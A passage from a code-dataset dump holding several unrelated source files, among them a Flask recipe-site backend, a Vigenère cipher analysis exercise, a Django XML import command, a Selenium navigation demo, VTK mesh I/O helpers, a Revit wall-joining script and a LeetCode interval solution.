redirect(url_for(\"admin\"))\n \n \n# Insert category to database (admin.html)\n@app.route(\"/insert_category\", methods=[\"POST\"])\ndef insert_category():\n addcategory = recipe.db.categories\n addcategory.insert_one(request.form.to_dict())\n return redirect(url_for(\"admin\"))\n \n\n# Insert Cuisine to database (admin.html)\n@app.route(\"/insert_cuisine\", methods=[\"POST\"])\ndef insert_cuisine():\n addcuisine = recipe.db.cuisines\n 
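# Note (assumption based on the form fields used elsewhere in this file):\n # request.form.to_dict() flattens the POSTed form into a plain dict such as\n # {'cuisine_name': 'Mediterranean'}, which insert_one() stores verbatim.\n 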
addcuisine.insert_one(request.form.to_dict())\n return redirect(url_for(\"admin\"))\n\n\n# Edit recipe (admin.html)\n@app.route(\"/edit_recipe/<task_id>\")\ndef edit_recipe(task_id):\n the_recipe = recipe.db.recipes.find_one({\"_id\": ObjectId(task_id)}) # fetch data from database with help of unique ID\n all_categories = recipe.db.categories.find() # Variable to list all categories in the database\n all_images = recipe.db.images.find() # Variable to list all images in the database\n all_cuisines = recipe.db.cuisines.find().sort('cuisine_name') # Variable to list all cuisines in the database\n return render_template(\"editrecipe.html\", page_title=\"Edit Recipe\", \n recipe = the_recipe, # variable to store all fetched recipes \n categories = all_categories, # variable to store all fetched categories \n images = all_images, # variable to store all fetched images \n cuisines = all_cuisines) # variable to store all fetched cuisines \n \n# Edit Category (admin.html)\n@app.route(\"/edit_category/<cat_id>\")\ndef edit_category(cat_id):\n return render_template(\"editcategory.html\", \n page_title=\"Edit Category\", \n category = recipe.db.categories.find_one({'_id': ObjectId(cat_id)})) # Variable to fetch and store a particular category based on its unique ID\n \n# Edit Cuisine (admin.html)\n@app.route(\"/edit_cuisine/<cus_id>\")\ndef edit_cuisine(cus_id):\n return render_template(\"editcuisine.html\", \n page_title=\"Edit Cuisine\", \n cuisines = recipe.db.cuisines.find_one({'_id': ObjectId(cus_id)})) # Variable to fetch and store a particular cuisine based on its unique ID\n\n\n# Update recipe (editrecipe.html)\n@app.route(\"/update_recipe/<task_id>\", methods=[\"POST\"])\ndef update_recipe(task_id):\n updaterecipe = recipe.db.recipes\n updaterecipe.replace_one({'_id': ObjectId(task_id)}, # Replace the document in the database based on its unique ID\n {\n 'recipe_name': request.form.get('recipe_name'), # Fetch updated data from the input field and store it in the right field in the database\n 'recipe_type': request.form.get('recipe_type'),\n 'recipe_image': request.form.get('recipe_image'),\n 'recipe_cuisine': request.form.get('recipe_cuisine'),\n 'ingredient_1': request.form.get('ingredient_1'),\n 'ingredient_2': request.form.get('ingredient_2'),\n 'ingredient_3': request.form.get('ingredient_3'),\n 'ingredient_4': request.form.get('ingredient_4'),\n 'ingredient_5': request.form.get('ingredient_5'),\n 'ingredient_6': request.form.get('ingredient_6'),\n 'ingredient_7': request.form.get('ingredient_7'),\n 'ingredient_8': request.form.get('ingredient_8'),\n 'ingredient_9': request.form.get('ingredient_9'),\n 'method_1': request.form.get('method_1'),\n 'method_2': request.form.get('method_2'),\n 'method_3': request.form.get('method_3'),\n 'method_4': request.form.get('method_4'),\n 'method_5': request.form.get('method_5'),\n 'method_6': request.form.get('method_6'),\n 'method_7': request.form.get('method_7'),\n 'method_8': request.form.get('method_8'),\n 'method_9': request.form.get('method_9'),\n 'create_on': request.form.get('create_on'),\n 'prep_time': request.form.get('prep_time'),\n 'cook_time': request.form.get('cook_time')\n })\n return redirect(url_for(\"admin\"))\n \n\n# Update Category (editcategory.html)\n@app.route(\"/update_category/<cat_id>\", methods=[\"POST\"])\ndef update_category(cat_id):\n updatecategory = recipe.db.categories\n updatecategory.replace_one({'_id': ObjectId(cat_id)}, # Replace the document in the database based on its unique ID\n {\n 'category_name' : request.form.get('category_name') # Fetch the updated category from the input field and store it in the right field in the database
\n })\n return redirect(url_for('admin'))\n\n\n# Update Cuisine (editcuisine.html) \n@app.route(\"/update_cuisine/<cus_id>\", methods=[\"POST\"])\ndef update_cuisine(cus_id):\n updatecuisine = recipe.db.cuisines\n updatecuisine.replace_one({'_id': ObjectId(cus_id)}, # Replace the document in the database based on its unique ID\n {\n 'cuisine_name' : request.form.get('cuisine_name') # Fetch the updated cuisine from the input field and store it in the right field in the database\n })\n return redirect(url_for('admin'))\n\n\n# Delete Recipe (admin.html)\n@app.route('/delete_recipe/<task_id>')\ndef delete_recipe(task_id):\n recipe.db.recipes.delete_one({'_id': ObjectId(task_id)}) # Delete a particular recipe from the database based on its unique ID\n return redirect(url_for('admin'))\n \n \n# Delete Category (admin.html)\n@app.route('/delete_category/<cat_id>')\ndef delete_category(cat_id):\n recipe.db.categories.delete_one({'_id': ObjectId(cat_id)}) # Delete a particular category from the database based on its unique ID\n return redirect(url_for('admin'))\n \n\n# Delete Cuisine (admin.html)\n@app.route('/delete_cuisine/<cus_id>')\ndef delete_cuisine(cus_id):\n recipe.db.cuisines.delete_one({'_id': ObjectId(cus_id)}) # Delete a particular cuisine from the database based on its unique ID\n return redirect(url_for('admin'))\n\n\n# Beef Recipe View (beef.html)\n@app.route('/beef')\ndef beef():\n return render_template(\"beef.html\",\n page_title = 'Beef Recipes', \n beef_recipe = recipe.db.recipes.find().sort('recipe_name'),\n beef_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Chicken Recipe View (chicken.html)\n@app.route('/chicken')\ndef chicken():\n return render_template(\"chicken.html\",\n page_title = 'Chicken Recipes', \n chick_recipe = recipe.db.recipes.find().sort('recipe_name'),\n chick_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Healthy Recipe View (healthy.html)\n@app.route('/healthy')\ndef healthy():\n return render_template(\"healthy.html\",\n page_title = 'Healthy Recipes', \n healthy_recipe = recipe.db.recipes.find().sort('recipe_name'),\n healthy_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Lamb Recipe View (lamb.html)\n@app.route('/lamb')\ndef lamb():\n return render_template(\"lamb.html\",\n page_title = 'Lamb Recipes', \n lamb_recipe = recipe.db.recipes.find().sort('recipe_name'),\n lamb_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Pork Recipe View (pork.html)\n@app.route('/pork')\ndef pork():\n return render_template(\"pork.html\",\n page_title = 'Pork Recipes', \n pork_recipe = recipe.db.recipes.find().sort('recipe_name'),\n pork_check = recipe.db.recipes.find().sort('recipe_name')) \n\n\n\n# Sea Food Recipe View (seafood.html)\n@app.route('/seafood')\ndef seafood():\n return render_template(\"seafood.html\",\n page_title = 'Sea Food Recipes', \n seafood_recipe = recipe.db.recipes.find().sort('recipe_name'),\n seafood_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Vegan Recipe View (vegan.html)\n@app.route('/vegan')\ndef vegan():\n return render_template(\"vegan.html\",\n page_title = 'Vegan Recipes', \n vegan_recipe = recipe.db.recipes.find().sort('recipe_name'),\n vegan_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Vegetable Recipe View (veg.html)\n@app.route('/veg')\ndef veg():\n return render_template(\"veg.html\",\n page_title = 'Vegetable Recipes', \n veg_recipe = recipe.db.recipes.find().sort('recipe_name'),\n veg_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Under 30 mins Recipe View (u30.html)\n@app.route('/u30')\ndef u30():\n return 
render_template(\"u30.html\",\n page_title = 'Recipes Under 30 Mins to Cook', \n u30_recipe = recipe.db.recipes.find().sort('recipe_name'),\n u30_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Over 30 mins Recipe View (o30.html)\n@app.route('/o30')\ndef o30():\n return render_template(\"o30.html\",\n page_title = 'Recipes Over 30 Mins to Cook', \n o30_recipe = recipe.db.recipes.find().sort('recipe_name'),\n o30_check = recipe.db.recipes.find().sort('recipe_name')) \n\n \n# American Cuisine View (american.html)\n@app.route('/american')\ndef american():\n return render_template(\"american.html\",\n page_title = 'American Cuisines',\n amc_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n amc_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Australian Cuisine View (australian.html) \n@app.route('/australian')\ndef australian():\n return render_template(\"australian.html\",\n page_title = 'Australian Cuisines',\n aus_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n aus_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Canadian Cuisine View (canadian.html) \n@app.route('/canadian')\ndef canadian():\n return render_template(\"canadian.html\",\n page_title = 'Canadian Cuisines',\n cnd_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n cnd_check = recipe.db.recipes.find().sort('recipe_name'))\n \n \n# Chinese Cuisine View (chinese.html) \n@app.route('/chinese')\ndef chinese():\n return render_template(\"chinese.html\",\n page_title = 'Chinese Cuisines',\n cnc_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n cnc_check = recipe.db.recipes.find().sort('recipe_name'))\n \n \n# European Cuisine View (earopean.html)\n@app.route('/european')\ndef european():\n return render_template(\"european.html\",\n page_title = 'European Cuisines',\n eur_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n eur_check = recipe.db.recipes.find().sort('recipe_name'))\n \n\n# Far Eastern Cuisine View (fareastern.html)\n@app.route('/fareastern')\ndef fareastern():\n return render_template(\"fareastern.html\",\n page_title = 'Far Eastern Cuisines',\n fre_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n fre_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Mediterranean Cuisine View (mediterranean.html)\n@app.route('/mediterranean')\ndef mediterranean():\n return render_template(\"mediterranean.html\",\n page_title = 'Mediterranean Cuisines',\n mdt_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n mdt_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# Middel Eastern Cuisine View (middleeastern.html)\n@app.route('/middleeastern')\ndef middleeastern():\n return render_template(\"middleeastern.html\",\n page_title = 'Middle Eastern Cuisines',\n mde_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n mde_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# North African Cuisine View (northafrican.html)\n@app.route('/northafrican')\ndef northafrican():\n return render_template(\"northafrican.html\",\n page_title = 'North African Cuisines',\n naf_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n naf_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# South African Cuisine View (southafrican.html)\n@app.route('/southafrican')\ndef southafrican():\n return render_template(\"southafrican.html\",\n page_title = 'South African Cuisines',\n saf_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n saf_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# South American Cuisine View 
(southamerican.html)\n@app.route('/southamerican')\ndef southamerican():\n return render_template(\"southamerican.html\",\n page_title = 'South American Cuisines',\n sam_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n sam_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n# South Asian Cuisine View (southasian.html)\n@app.route('/southasian')\ndef southasian():\n return render_template(\"southasian.html\",\n page_title = 'South Asian Cuisines',\n sas_cuisine = recipe.db.recipes.find().sort('recipe_name'),\n sas_check = recipe.db.recipes.find().sort('recipe_name'))\n\n\n\n@app.route(\"/recipes/<recipe_name>\")\ndef about_recipe(recipe_name):\n recipe_doc = {} # local name chosen so the global PyMongo handle is not shadowed\n with open(\"data/recipes.json\", \"r\") as json_data:\n data = json.load(json_data)\n for obj in data:\n if obj[\"url\"] == recipe_name:\n recipe_doc = obj\n return render_template(\"description.html\", recipe=recipe_doc)\n\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\", \"0.0.0.0\"),\n port=int(os.environ.get(\"PORT\", \"5000\")),\n debug=False)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":26337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"527901198","text":"import re, math, string, collections, pprint\n\nprint('\\n TASK 1 and 2\\n')\n\nf = open('text2.txt', 'r', encoding='utf-8').read()\nf = f.lower()\nrus_alph = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\n\nfor letter in f:\n if letter not in rus_alph:\n f = f.replace(letter, '')\n\nf = f.replace('ё', 'е').replace('\\n', '')\nf = re.sub(\" +\", \" \", f)\n\nprint('Plaintext:\\n', f, '\\n')\n\nalpha = 'абвгдежзийклмнопрстуфхцчшщъыьэюя'\nlet_pl = {}\npl_let = {}\n\n##### indices of coincidence\namount_word = collections.Counter(f)\n\n# pprint.pprint(dict(word_count))\n\ntext_ind = 0\n\nfor i in amount_word:\n text_ind += amount_word[i] * (amount_word[i] - 1)\n\ntext_ind = text_ind / (len(f) * (len(f) - 1))\n\nprint('\\n', 'INDEX OPEN TEXT: ', text_ind, '\\n')\n\n##########################\ni = 0\nfor letter in alpha:\n let_pl[letter] = i\n pl_let[i] = letter\n i += 1\n\nprint(let_pl['а'])\n\nkeys = [\"ад\", \"лом\", \"сало\", \"плохо\", \"електростанция\"]\nj = 0\nencr_text = []\nfr_encr_text = []\nstr_encr_text = \"\"\nlength_key = len(keys)\n\nfor j in range(0, length_key):\n key = keys[j]\n len_key = len(key)\n i = 0\n for letter in f:\n open_letter = let_pl[letter]\n encrypt_letter_pos = (open_letter + let_pl[key[i]]) % 32\n encrypt_letter = pl_let[encrypt_letter_pos]\n i = (i + 1) % len(key)\n str_encr_text += str(encrypt_letter)\n\n print('Ciphertext with key ', key, ', of length ', len_key, ':\\n', str_encr_text, '\\n')\n\n amount_encrypt = len(str_encr_text)\n word_count_encrypt = collections.Counter(str_encr_text)\n\n index_encrypt_text = 0\n\n for n in word_count_encrypt:\n index_encrypt_text += word_count_encrypt[n] * (word_count_encrypt[n] - 1)\n\n index_encrypt_text = index_encrypt_text / ((len(str_encr_text) - 1) * len(str_encr_text))\n\n print('\\n', 'INDEX ENCRYPT TEXT WITH KEY', key, ' : ', index_encrypt_text, '\\n')\n\n fr_encr_text.append(index_encrypt_text)\n encr_text.append(str_encr_text)\n str_encr_text = \"\"\n j += 1\n\n####### TASK 3\n\nprint('\\n TASK 3\\n')\n\nword_fr = {'а': '0.08267',\n 'б': '0.01787',\n 'в': '0.04306',\n 'г': '0.01597',\n 'д': '0.03169',\n 'е': '0.08788',\n 'ж': '0.01063',\n 'з': '0.01618',\n 'и': '0.06673',\n 'й': '0.01210',\n 'к': '0.03309',\n 'л': '0.04911',\n 'м': '0.03424',\n 'н': '0.06605',\n 'о': '0.10897',\n 'п': '0.02385',\n 
'р': '0.04139',\n 'с': '0.05668',\n 'т': '0.06016',\n 'у': '0.02625',\n 'ф': '0.00142',\n 'х': '0.00788',\n 'ц': '0.00292',\n 'ч': '0.01534',\n 'ш': '0.00846',\n 'щ': '0.00315',\n 'ъ': '0.00021',\n 'ы': '0.01991',\n 'ь': '0.02139',\n 'э': '0.00498',\n 'ю': '0.00547',\n 'я': '0.02434'}\n\nmax_fr_let = 0\n\nfor i in word_fr:\n if max_fr_let < float(word_fr[i]):\n max_fr_let = float(word_fr[i])\n max_let = i\n\nmax_let_place = int(let_pl[max_let])\n\nth_index = 0\n\nfor n in word_fr:\n th_index += pow(float(word_fr[n]), 2)\n\nprint('\\n', 'THEORETICAL INDEX : ', th_index, '\\n')\n\nencrypt_file = open('text.txt', 'r', encoding='utf-8').read()\nencrypt_file = encrypt_file.replace('\\n', '')\n\nencrypt_amount = len(encrypt_file)\nencrypt_fr = collections.Counter(encrypt_file)\n\nprint(encrypt_file)\n\nind_y = {}\ny_mass = {}\nfor r in range(1, 33, 1):\n y = []\n\n for j in range(0, r, 1):\n\n y_letters = \"\"\n index_y = 0\n\n for i in range(j, len(encrypt_file), r):\n letter = encrypt_file[i]\n y_letters += letter\n\n y_letters_fr = collections.Counter(y_letters)\n\n for i in y_letters_fr:\n index_y += y_letters_fr[i] * (y_letters_fr[i] - 1)\n\n index_y = index_y / (len(y_letters) * (len(y_letters) - 1))\n\n y.append(index_y)\n\n y_mass[r] = sum(y) / len(y)\n\nprint(y_mass)\n\nclosest = float('inf')\nfor i in range(2, 31, 1):\n iq = math.fabs(th_index - y_mass[i])\n print(th_index, '-', y_mass[i], '=', iq)\n if iq < closest:\n closest = iq\n closest_amount = y_mass[i]\n key_r = i\n\nprint('\\nKey length r=', key_r, '\\nValue:', closest_amount, 'is the closest to the theoretical value', th_index, '\\n')\n\ny = []\nencr_word = \"\"\nfor j in range(0, key_r, 1):\n print('\\nY', j)\n y_letters = \"\"\n index_y = 0\n\n for i in range(j, len(encrypt_file), key_r):\n letter = encrypt_file[i]\n y_letters += letter\n\n y_letters_fr = collections.Counter(y_letters)\n print('\\n', y_letters, '\\n')\n\n for i in y_letters_fr:\n fr = y_letters_fr[i] / (len(y_letters))\n fr = '%.5f' % fr\n y_letters_fr[i] = fr\n\n max_fr = 0\n max_fr_mass = []\n for i in y_letters_fr:\n if max_fr < float(y_letters_fr[i]):\n max_fr = float(y_letters_fr[i])\n max_letter = i\n\n print('The most frequent letter is: ', max_letter, ', frequency: ', max_fr, '\\n')\n\n place = int(let_pl[max_letter])\n # assume the most frequent ciphertext letter maps to 'о' (index 14 in alpha)\n encrypt_key = (place - 14) % 32\n\n print('Key letter:', pl_let[encrypt_key])\n\n encr_word += pl_let[encrypt_key]\n encrypt_key = (place) % 32\n print('Possible substitution letter:', pl_let[encrypt_key])\n\nencr_word = \"венецианскийкупец\" # hard-coded recovered key, overriding the letter-by-letter guess above\nprint('\\nKEY: ', encr_word)\n\ni = 0\ndecr_file = \"\"\nfor letter in encrypt_file:\n decr_letter_place = (int(let_pl[letter]) - int(let_pl[encr_word[i]])) % 32\n decr_letter = pl_let[decr_letter_place]\n decr_file += decr_letter\n i = (i + 1) % key_r\n\nprint('\\nDecrypted text:\\n', decr_file)\n","sub_path":"cp_2/morozov_fb-72_sinicin_fb-73_cp2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"184404388","text":"import argparse\nfrom django.core.management.base import BaseCommand\nfrom bc211.import_icarol_xml.importer import parse_csv, update_all_organizations\nfrom bc211.import_icarol_xml.import_counters import ImportCounters\nimport xml.etree.ElementTree as etree\n\n# invoke as follows:\n# python manage.py import_icarol_xml path/to/bc211.xml\n\n\nclass Command(BaseCommand):\n help = 'Import BC-211 data from XML file'\n\n def add_arguments(self, parser):\n 
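# argparse.FileType('r') opens the given path itself, so handle() below\n # receives an already-open text stream that etree.iterparse can consume\n # directly without reopening the file.\n 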
parser.add_argument('file',\n type=argparse.FileType('r'),\n metavar='file',\n help='Path to XML file containing BC-211 data')\n parser.add_argument('--cityLatLongs',\n metavar='cityLatLongs',\n help='Path to CSV file containing city to latlong dictionary')\n\n def handle(self, *args, **options):\n file = options['file']\n if options['cityLatLongs']:\n city_latlong_map = parse_csv(options['cityLatLongs'])\n else:\n city_latlong_map = {}\n counts = ImportCounters()\n nodes = etree.iterparse(file, events=('end',))\n update_all_organizations(nodes, city_latlong_map, counts)\n self.print_status_message(counts)\n\n def print_status_message(self, counts):\n message = f'{counts.organizations_created} organizations created. '\n message += f'{counts.locations_created} locations created. '\n message += f'{counts.services_created} services created. '\n message += f'{counts.taxonomy_term_count} taxonomy terms created. '\n message += f'{counts.address_count} addresses created. '\n message += f'{counts.phone_at_location_count} phone numbers created '\n message += f'and {counts.phone_number_types_count} phone number types created. '\n\n self.stdout.write(self.style.SUCCESS(message))\n","sub_path":"bc211/management/commands/import_icarol_xml.py","file_name":"import_icarol_xml.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"482471436","text":"\"\"\"\nbrowser_navigation: browser navigation operations\n\"\"\"\nfrom selenium import webdriver\nimport settings\nimport time\n\n# create the browser driver object\ndriver = webdriver.Chrome(settings.driver_path)\n\n# go to the address\ndriver.get(\"https://istanbulakademi.meb.gov.tr\")\n\n# print the current address\nprint(driver.current_url)\n\ntime.sleep(2)\n\n# go to a new address\ndriver.get(\"https://istanbulakademi.meb.gov.tr/akademiler.php?pID=615\")\nprint(driver.current_url)\n\ntime.sleep(2)\n\n# go back to the previous page\ndriver.back()\nprint(driver.current_url)\n\ntime.sleep(2)\n\n# go forward to the next page\ndriver.forward()\nprint(driver.current_url)\n\ntime.sleep(2)\n\n# print the page title\nprint(driver.title)\n\ntime.sleep(2)\n\n# close the browser\ndriver.close()\n","sub_path":"teachers/mfatiharslan/browser_navigation.py","file_name":"browser_navigation.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"308692857","text":"from __future__ import absolute_import\nimport os\n\nfrom .helper import SolveBioTestCase\nfrom solvebio.utils.files import check_gzip_path\n\n\nclass GzipTest(SolveBioTestCase):\n\n def test_gzip_file(self):\n # build each path from the data directory instead of the previous\n # iteration's path, which used to nest the file names\n data_dir = os.path.join(os.path.dirname(__file__), \"data\")\n for yes_gzip in ['some_export.json.gz',\n 'sample.vcf.gz']:\n path = os.path.join(data_dir, yes_gzip)\n self.assertTrue(check_gzip_path(path), path)\n\n for non_gzip in ['sample2.vcf',\n 'test_export.json',\n 'test_export.csv',\n 'test_export.xlsx']:\n path = os.path.join(data_dir, non_gzip)\n self.assertFalse(check_gzip_path(path), path)\n","sub_path":"solvebio/test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"108412412","text":"import vtk\n\n\ndef read_polydata(vtp_filename, use_vmtk=False):\n if use_vmtk:\n from vmtk import pypes\n arg = 'vmtksurfaceviewer -ifile {}'.format(vtp_filename)\n pype_obj = pypes.PypeRun(arg)\n script_obj = 
pype_obj.GetScriptObject(\"vmtksurfaceviewer\", '0')\n poly_obj = script_obj.Surface\n return poly_obj\n\n else:\n # TODO(sglee): implement this branch; it does not work with the current code\n reader = vtk.vtkXMLPolyDataReader()\n reader.SetFileName(vtp_filename)\n reader.Update()\n poly_obj = reader.GetOutput()\n return poly_obj\n\n\ndef write_stl_and_obj(poly_obj, output_file_prefix):\n \"\"\"\n Take a 3D shape and write it out as STL and OBJ files.\n :param poly_obj: 3D shape to export (vtkPolyData)\n :param output_file_prefix: output file name (must not include an extension)\n \"\"\"\n stl_filename = output_file_prefix + '.stl'\n obj_fileprefix = output_file_prefix\n\n # STL Write\n stlWriter = vtk.vtkSTLWriter()\n stlWriter.SetFileName(stl_filename)\n stlWriter.SetInputDataObject(poly_obj)\n stlWriter.Write()\n\n # Draw Before OBJ Write\n # Now we'll look at it.\n mapper = vtk.vtkPolyDataMapper()\n if vtk.VTK_MAJOR_VERSION <= 5:\n mapper.SetInput(poly_obj)\n else:\n mapper.SetInputData(poly_obj)\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n\n # Create a rendering window and renderer\n ren = vtk.vtkRenderer()\n renWin = vtk.vtkRenderWindow()\n renWin.AddRenderer(ren)\n\n # Create a renderwindowinteractor\n iren = vtk.vtkRenderWindowInteractor()\n iren.SetRenderWindow(renWin)\n\n # Assign actor to the renderer\n ren.AddActor(actor)\n\n # Enable user interface interactor\n iren.Initialize()\n renWin.Render()\n # iren.Start() # uncomment this to open an interactive viewer window\n\n # OBJ Write\n objExporter = vtk.vtkOBJExporter()\n objExporter.SetFilePrefix(obj_fileprefix)\n objExporter.SetRenderWindow(renWin)\n objExporter.Write()\n\n\ndef write_obj(poly_obj, output_file_prefix):\n \"\"\"\n Take a 3D shape and write it out as an OBJ file.\n :param poly_obj: 3D shape to export (vtkPolyData)\n :param output_file_prefix: output file name (must not include an extension)\n \"\"\"\n obj_file_prefix = output_file_prefix\n\n # Draw Before OBJ Write\n # Now we'll look at it.\n mapper = vtk.vtkPolyDataMapper()\n if vtk.VTK_MAJOR_VERSION <= 5:\n mapper.SetInput(poly_obj)\n else:\n # NOTE: temporarily replaced with SetInputConnection for testing\n mapper.SetInputData(poly_obj)\n # mapper.SetInputConnection(poly_obj.GetOutputPort())\n actor = vtk.vtkActor()\n actor.GetProperty().SetRepresentationToWireframe()\n actor.SetMapper(mapper)\n\n # Create a rendering window and renderer\n ren = vtk.vtkRenderer()\n renWin = vtk.vtkRenderWindow()\n renWin.AddRenderer(ren)\n\n # Create a renderwindowinteractor\n iren = vtk.vtkRenderWindowInteractor()\n iren.SetRenderWindow(renWin)\n\n # Assign actor to the renderer\n ren.AddActor(actor)\n\n # Enable user interface interactor\n iren.Initialize()\n renWin.Render()\n iren.Start() # comment this out to skip the interactive viewer window\n\n # OBJ Write\n objExporter = vtk.vtkOBJExporter()\n objExporter.SetFilePrefix(obj_file_prefix)\n objExporter.SetRenderWindow(renWin)\n objExporter.Write()","sub_path":"src/topic_tutorial/scripts/lib/common/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"84053034","text":"\"\"\"\nQuestion: https://www.codechef.com/problems/LECANDY\n\nVariables:\nt : testcases, holding the number of testcases\nn : number of elephants in the zoo\nc : number of candies in the zoo\na : array containing the number of candies required\n to make each elephant happy, in order\n\"\"\"\n\nimport sys\n\nif __name__ == \"__main__\":\n t = list(map(int, input().split()))[0]\n\n for i in range(0, t):\n n, c = list(map(int, input().split()))\n a = list(map(int, input().split()))\n\n # if elephants > candies\n if n > c:\n print('No')\n 
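# fewer candies than elephants means at least one elephant must get zero\n # candies, so we already answered No and skip to the next testcase\n 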
continue\n\n # if not then we proceed\n if sum(a) > c:\n print('No')\n else:\n print('Yes')\n continue\n","sub_path":"arrays/lecandy.py","file_name":"lecandy.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"610029973","text":"\"\"\"Joins all walls.\"\"\"\n\n__title__ = 'Join\\nWalls'\n\n\n\nimport clr\nclr.AddReference('RevitAPI')\nfrom Autodesk.Revit.DB import *\nfrom System.Collections.Generic import *\nclr.AddReference(\"RevitServices\")\nimport RevitServices\nfrom RevitServices.Persistence import DocumentManager\nfrom RevitServices.Transactions import TransactionManager\nimport itertools\ndoc = __revit__.ActiveUIDocument.Document\n\nwalls= FilteredElementCollector(doc).OfCategory(BuiltInCategory.OST_Walls).WhereElementIsNotElementType().ToElements()\nopt = Options()\n\nGeom=[i.get_Geometry(opt) for i in walls]\nSolids = list(itertools.chain(*Geom))\ntx = Transaction(doc, 'join walls')\ntx.Start()\nfor i in range (len(walls)):\n for j in range (i,len(walls)):\n surface1 = Solids[i].Faces[0].GetSurface()\n surface2 = Solids[i].Faces[1].GetSurface()\n surface3 = Solids[j].Faces[0].GetSurface()\n surface4 = Solids[j].Faces[1].GetSurface()\n if not (JoinGeometryUtils.AreElementsJoined(doc, walls[i], walls[j])) and (BooleanOperationsUtils.ExecuteBooleanOperation(Solids[i], Solids[j], BooleanOperationsType.Intersect).Volume)*0.0283168 > 0.0 and i!=j:\n JoinGeometryUtils.JoinGeometry(doc, walls[i], walls[j])\n elif surface1.Project(surface4.Origin)[1] < 0.00001 or surface2.Project(surface3.Origin)[1] <0.00001:\n JoinGeometryUtils.JoinGeometry(doc, walls[i], walls[j])\n \ntx.Commit()","sub_path":"join_script.py","file_name":"join_script.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"496665910","text":"\"\"\"\nGiven a data stream input of non-negative integers a1, a2, ..., an, ..., summarize the numbers seen so far as a list of disjoint intervals.\n\nFor example, suppose the integers from the data stream are 1, 3, 7, 2, 6, ..., then the summary will be:\n\n[1, 1]\n[1, 1], [3, 3]\n[1, 1], [3, 3], [7, 7]\n[1, 3], [7, 7]\n[1, 3], [6, 7]\nFollow up:\nWhat if there are lots of merges and the number of disjoint intervals are small compared to the data stream's size?\n\n\n\"\"\"\nimport heapq\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\nclass SummaryRanges(object):\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.min_heap = []\n\n def addNum(self, val):\n \"\"\"\n :type val: int\n :rtype: void\n \"\"\"\n heapq.heappush(self.min_heap, (val, Interval(val, val)))\n\n # O(nlgn)\n def getIntervals(self):\n \"\"\"\n :rtype: List[Interval]\n \"\"\"\n self.stack = []\n while self.min_heap:\n val, interval = heapq.heappop(self.min_heap)\n if not self.stack:\n self.stack.append((val, interval))\n else:\n _, last_interval = self.stack[-1]\n if interval.start <= last_interval.end + 1:\n last_interval.end = max(last_interval.end, interval.end)\n else:\n self.stack.append((val, interval))\n self.min_heap = self.stack\n return list(map(lambda x: x[1], self.stack))\n","sub_path":"leetcode/352_data_stream_as_disjoint_intervals.py","file_name":"352_data_stream_as_disjoint_intervals.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} 
